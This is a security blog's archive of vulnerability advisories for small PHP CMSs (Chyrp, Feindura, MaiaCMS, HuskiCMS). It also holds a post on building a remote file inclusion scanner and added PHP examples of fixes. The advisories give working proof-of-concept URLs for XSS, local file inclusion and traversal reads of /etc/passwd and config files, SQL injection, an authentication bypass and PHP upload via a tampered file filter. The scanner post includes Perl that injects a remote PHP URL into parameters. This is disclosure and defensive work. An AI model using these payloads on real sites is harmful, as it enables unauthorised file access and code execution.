Results tagged “file inclusion” from Just Another Hacker

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilities
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern.
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php XSS can also be invoked through the rewrite rules using the following query string:
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file, resulting in cross site
scripting if register_globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a PHP gotcha: strpos returns 0 for a match at position 0, and 0 is falsy, so using its return
value directly in an if statement results in a false negative for that case.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php
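The gotcha above made concrete, as an added example written for this page (not Chyrp's gz.php, which the advisory does not quote; the base directory and file names are constructed): the falsy-zero strpos check beside a realpath containment check, which rejects a /themes/../ payload however deep the .. sits.

```php
<?php
// Added example, not Chyrp's code: the strpos() gotcha the advisory describes, and a
// containment check that does not rely on substring matching at all.

// strpos() returns int(0) for a match at offset 0, and 0 is falsy, so a plain truthiness
// test misses exactly that case.
function naive_has_traversal(string $file): bool
{
    return strpos($file, '..') ? true : false;   // BUG: '../x' matches at offset 0, 0 is falsy
}

function correct_has_traversal(string $file): bool
{
    return strpos($file, '..') !== false;        // identity comparison: offset 0 counts
}

// Substring checks are a weak fix anyway. Resolving the path and checking that it stays
// under the base directory is what actually stops '/themes/../../../etc/passwd'.
function resolve_within_base(string $base, string $requested): ?string
{
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . ltrim($requested, '/'));
    if ($baseReal === false || $target === false) {
        return null;                               // base missing, or file does not exist
    }
    // Compare with a trailing separator so base '/srv/themes' does not accept '/srv/themes2/x'.
    if (strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;                               // resolved outside the base directory
    }
    return $target;
}

// Constructed demo: a throwaway base directory holding one legitimate file.
$base = sys_get_temp_dir() . '/gz_demo_' . getmypid();
mkdir($base . '/themes', 0700, true);
file_put_contents($base . '/themes/style.css', "body{}\n");

var_dump(naive_has_traversal('../etc/passwd'));     // the gotcha: leading '..' slips past
var_dump(correct_has_traversal('../etc/passwd'));   // same input, identity comparison
var_dump(resolve_within_base($base, 'themes/style.css'));               // legitimate request
var_dump(resolve_within_base($base, '/themes/../../../../etc/passwd')); // the advisory's payload shape

unlink($base . '/themes/style.css');
rmdir($base . '/themes');
rmdir($base);
```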


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp versions <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is only restricted through JavaScript. Modify the JS in
the page using Firebug or an intercepting proxy to allow *.php uploads. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing the JS is far easier.

PoC:
Appended ;*.php to the file_types string in the script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using an intercepting proxy:
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
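What the server side has to do instead of trusting file_types, as an added example written for this page (not Chyrp's upload_handler.php; the directory, the MIME allow-list and the sample files are constructed):

```php
<?php
// Added example, not Chyrp's code: server-side checks that a client-side file_types filter
// cannot replace. The server derives the extension and the stored name from the bytes it
// received, so a modified SWFUpload config or a direct POST cannot get a .php file stored.

const ALLOWED_IMAGE_TYPES = [   // sniffed MIME type => extension the server assigns
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the stored path, or throws with the reason the file was rejected.
function store_uploaded_image(string $tmpPath, string $uploadDir): string
{
    // 1. Sniff the content; the client-supplied name and Content-Type are not consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException("rejected: content type '$mime' is not an allowed image");
    }
    // 2. Confirm the file actually decodes as an image of that type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('rejected: does not decode as the sniffed image type');
    }
    // 3. The server picks the name: random, with the extension taken from the sniffed type,
    //    so 'shell.php' and 'x.php.gif' can never become a .php file in the upload directory.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!rename($tmpPath, $dest)) {     // move_uploaded_file() in a real request handler
        throw new RuntimeException('store failed');
    }
    return $dest;
}

// Constructed demo: a 1x1 GIF, and a PHP script that the client named photo.php.gif.
$dir = sys_get_temp_dir() . '/upload_demo_' . getmypid();
mkdir($dir, 0700, true);
file_put_contents("$dir/a.tmp", base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
file_put_contents("$dir/b.tmp", "<?php echo 'not an image'; ?>\n");

foreach (['a.tmp' => 'photo.gif', 'b.tmp' => 'photo.php.gif'] as $tmp => $clientName) {
    try {
        echo "$clientName stored as ", basename(store_uploaded_image("$dir/$tmp", $dir)), "\n";
    } catch (RuntimeException $e) {
        echo "$clientName ", $e->getMessage(), "\n";
    }
}

array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Keeping the upload directory outside the web root, or with script execution disabled for it, is the second layer if the checks above are ever bypassed.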

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is an Open Source flat-file based Content Management System for Web Designers,
written in PHP. There is no need for a database and it's easy to integrate into your Websites.
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS suffers from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned directly from user input and is later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-fix" for IE 4.x & 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting in arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00
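Letting the request pick a language without letting it pick the path, as an added example written for this page (not Feindura's backend.include.php; the directory and language files are constructed): the include target comes from an allow-list built by listing the lang directory, and the shape check runs before the value would be stored in the session.

```php
<?php
// Added example, not Feindura's code: selecting a language file from user input without the
// input ever forming the path. '../', an absolute path and a trailing NUL all fail the shape
// check, and only names found in the lang directory itself are accepted after that.

function available_languages(string $langDir): array
{
    $languages = [];
    foreach (glob($langDir . '/*.backend.php') as $path) {
        // 'en.backend.php' -> 'en': the directory listing, not the request, defines the set.
        $languages[] = substr(basename($path), 0, -strlen('.backend.php'));
    }
    return $languages;
}

function select_language(?string $requested, array $allowed, string $default = 'en'): string
{
    // A language code is short and alphanumeric; anything else (including a NUL byte,
    // since the pattern is anchored) is rejected before any filesystem lookup.
    if ($requested === null || !preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $requested)) {
        return $default;
    }
    // Strict membership in the set derived from the directory.
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Constructed demo directory with two language files.
$langDir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($langDir, 0700, true);
file_put_contents($langDir . '/en.backend.php', "<?php return ['hello' => 'Hello'];\n");
file_put_contents($langDir . '/de.backend.php', "<?php return ['hello' => 'Hallo'];\n");
$allowed = available_languages($langDir);

// Validate at the point of assignment, because $_SESSION['language'] outlives this request.
foreach (['de', 'fr', "../../../../../../../etc/passwd\0", 'en'] as $input) {
    $lang    = select_language($input, $allowed);     // what would go into $_SESSION['language']
    $strings = include $langDir . '/' . $lang . '.backend.php';
    printf("%-36s -> %s (%s)\n", addcslashes($input, "\0"), $lang, $strings['hello']);
}

array_map('unlink', glob($langDir . '/*.backend.php'));
rmdir($langDir);
```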

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Writing a better RFI scanner

So I had this chat with the boys in the office the other day and mentioned my long-standing thoughts on how automated remote file inclusion scans should be done right, and figured I might as well share it with everyone.

Most tools today will just try to fetch a web URL, like http://www.google.com, and claim that they have found a remote file inclusion. I suppose technically it is still accurate, but I mostly care about code execution, not so much web proxy scripts. To be honest, detecting code execution is pretty trivial. Sure, it becomes more annoying as you try to support multiple languages, but for now, let's focus on the worst RFI offender: PHP.

Let's pretend I'm writing a scanner, and this scanner uses the normal crawl-and-replace-querystring-values-with-my-RFI-URL approach. My first port of call is to create a code snippet that I will use for testing code execution. I've picked the string "just another remote file inclusion!" as my signature. Now we add some complexity to ensure that we don't accidentally get a false positive on the remote chance that the webpage we're fuzzing happens to contain that string.

~$ echo -n 'just another remote file inclusion!' | md5sum -
8a7f7dc99a12132a94c88b931e92f463  -
~$ echo -n '8a7f7dc99a12132a94c88b931e92f463' | uuencode -m -
begin-base64 644 -
OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=
====
This gives me both the code exec and non-code-exec signatures. We stuff the base64 into a PHP file like so: [RFIproof.txt]
<?php echo(base64_decode('OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=')); ?>
Then I write a simple snippet to check for RFI:
use LWP::Simple;    # provides get()

sub check_RFI_exec {
    my ($url, $querystring, $fuzzparam) = @_;   # Function arguments
    # Using ! as the delimiter to avoid escaping the slashes in the URL
    $querystring =~ s!$fuzzparam=[^&]+!$fuzzparam=http://www.justanotherhacker.com/RFIproof.txt!;
    my $content = get("$url?$querystring");    # Fetching url using LWP::Simple
    if ($content =~ m/8a7f7dc99a12132a94c88b931e92f463/) {    # md5sum means the base64 was exec'ed
        print "RFI code exec at: $url?$querystring\n";
    } elsif ($content =~ m/OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=/) {   # base64 string means no exec
        print "RFI without exec: $url?$querystring\n";
    }
}
I chose Perl, but you can write yours in whatever language you choose. Adding some error handling is recommended, but I left it out as it's only a hypothetical code snippet. I'm not actually writing this scanner, but hopefully someone else will.
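Seen from the server being scanned, as an added example written for this post (not the scanner above; the log lines and hostnames are constructed): a crawl-and-replace scan leaves ordinary parameters carrying absolute URLs in the access log, which is easy to pick out.

```php
<?php
// Added example, not the post's scanner: the defender's view of a crawl-and-replace RFI scan.
// Each probe turns an ordinary parameter value into an absolute URL, and that shows up in
// the access log regardless of whether the include succeeded.

// Constructed access log lines in common log format (RFC 5737 documentation addresses).
$sampleLog = <<<'LOG'
203.0.113.5 - - [13/Jul/2011:10:00:01 +1000] "GET /index.php?page=home HTTP/1.1" 200 5120
203.0.113.5 - - [13/Jul/2011:10:00:02 +1000] "GET /index.php?page=http://example.net/RFIproof.txt HTTP/1.1" 200 5200
203.0.113.5 - - [13/Jul/2011:10:00:03 +1000] "GET /view.php?id=42&tpl=https%3A%2F%2Fexample.net%2Fx.txt%3F HTTP/1.1" 500 310
198.51.100.7 - - [13/Jul/2011:10:01:00 +1000] "GET /index.php?page=about HTTP/1.1" 200 4980
LOG;

// Returns [client, path, parameter, value] for every parameter whose value is an absolute URL.
function find_url_parameters(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;                                  // not a request line we understand
        }
        [, $client, $target] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;                                  // no query string at all
        }
        parse_str($query, $params);                    // decodes %-escapes, so https%3A%2F%2F is seen too
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(?:https?|ftp|php|data)://#i', $value)) {
                $hits[] = [$client, parse_url($target, PHP_URL_PATH), (string) $name, $value];
            }
        }
    }
    return $hits;
}

foreach (find_url_parameters($sampleLog) as [$client, $path, $name, $value]) {
    printf("%s %s param=%s value=%s\n", $client, $path, $name, $value);
}
```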

Custom graudit signatures

Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation, and signatures are just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low-hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming RSS readers.

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms; here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages have a check-and-redirect-to-login snippet to validate the login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the aforementioned access control weakness and allows the session data to be changed or created directly through an HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>
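Both patterns with the missing pieces supplied, as an added example written for this page (not MaiaCMS code; the session keys and their validators are constructed):

```php
<?php
// Added example, not MaiaCMS code: the two patterns the advisory describes, corrected.
// 1) A Location header does not stop the script; code after it still runs for an
//    unauthenticated client, so the guard has to terminate the request itself.
// 2) Copying every POST key into $_SESSION lets the client set any session field; only
//    named keys with validated values should be writable.

function require_admin(array $session, string $loginUrl = '/admin/login.php'): void
{
    if (empty($session['is_admin'])) {
        header('Location: ' . $loginUrl, true, 302);
        exit;   // the missing line: nothing below the guard runs for a non-admin
    }
}

// Session keys a client may update, each with a validator; anything else is ignored.
const SESSION_WRITABLE = [
    'editor_theme' => '/^[a-z_]{1,32}$/',
    'page_size'    => '/^(10|25|50|100)$/',
];

function apply_session_update(array $post, array $session): array
{
    foreach (SESSION_WRITABLE as $key => $pattern) {
        if (isset($post[$key]) && is_string($post[$key]) && preg_match($pattern, $post[$key])) {
            $session[$key] = $post[$key];
        }
    }
    return $session;   // 'is_admin', 'user_id', ... are never reachable from client input
}

// Constructed demo: a request carrying an admin flag and an out-of-range page size next to
// a harmless preference. require_admin() would exit on this session, so only the update is run.
$post    = ['editor_theme' => 'dark', 'is_admin' => '1', 'page_size' => '9999'];
$session = ['is_admin' => false, 'editor_theme' => 'light'];
var_dump(apply_session_update($post, $session));
```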

--- Solution ---
Wait for the next (non-alpha) release.

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS.
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledged vulnerability
28-Jan-2010 - Vendor notified through email
 
This weblog is licensed under a Creative Commons License.